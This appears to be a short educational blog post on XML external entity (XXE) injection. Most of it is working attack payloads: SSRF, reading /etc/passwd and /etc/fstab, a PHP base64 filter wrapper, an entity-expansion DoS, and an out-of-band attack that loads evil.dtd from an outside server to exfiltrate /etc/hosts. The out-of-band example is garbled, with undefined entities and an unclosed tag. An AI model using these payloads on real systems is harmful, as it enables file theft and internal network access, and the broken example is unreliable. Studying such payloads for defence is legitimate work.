What are XXE vulnerabilities?

XML external entity (XXE) vulnerabilities (also called XML external entity injections or XXE injections) happen if a web application or API accepts unsanitized XML data and its back-end XML parser is configured to allow external XML entity parsing. XXE vulnerabilities can let malicious hackers perform attacks such as server-side request forgery (SSRF), local file inclusion (LFI), directory traversal, remote code execution (RCE), network port scanning, and denial of service (DoS).

Example of XXE-based SSRF

POST http://example.com/xml HTTP/1.1
<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE foo [
<!ELEMENT foo ANY>
<!ENTITY xxe SYSTEM
"http://192.168.0.1/secret.txt">
]>
<foo>
&xxe;
</foo>

Example of XXE local data exfiltration

POST http://example.com/xml HTTP/1.1
<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE foo [
<!ELEMENT foo ANY>
<!ENTITY xxe SYSTEM
"file:///etc/passwd">
]>
<foo>
&xxe;
</foo>

Limitations and workarounds for exfiltrating XML data

POST http://example.com/xml HTTP/1.1
<!DOCTYPE foo [
<!ELEMENT foo ANY>
<!ENTITY bar SYSTEM
"file:///etc/fstab"&gt;
]>
<foo>
&bar;
</foo>

Using PHP protocol wrappers

POST http://example.com/xml.php HTTP/1.1
<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE foo [
<!ELEMENT foo ANY>
<!ENTITY bar SYSTEM
"php://filter/read=convert.base64-encode/resource=/etc/fstab">
]>
<foo>
&bar;
</foo>

Example of an XXE DoS attack

POST http://example.com/xml HTTP/1.1
<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE foo [
<!ELEMENT foo ANY>
<!ENTITY bar "World ">
<!ENTITY t1 "&bar;&bar;">
<!ENTITY t2 "&t1;&t1;&t1;&t1;">
<!ENTITY t3 "&t2;&t2;&t2;&t2;&t2;">
]>
<foo>
Hello &t3;
</foo>

What is OOB XXE?

Out-of-band XML external entity (OOB XXE) vulnerabilities are a type of XXE vulnerability where the attacker does not receive an immediate response to the XXE payload. The attack is conducted using one channel, such as a direct HTTP request, while the results (such as sensitive files) are received through another channel – often an HTTP server controlled by the attacker.

Example of OOB XXE

evil.dtd

<!ENTITY evil SYSTEM "file:///etc/hosts">

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE root [
<!ENTITY file SYSTEM
"file:///etc/hosts">
<!ENTITY % dtd SYSTEM
"http://192.168.9.52:8787/ctf_train/php/evil.dtd">
<!ENTITY bar SYSTEM
"php://filter/read=convert.base64-encode/resource=/etc/fstab">
%dtd;
%all;
]>
<root>
<user>
&file;
&fileContents;
<user>
</root>

Andrew's Blog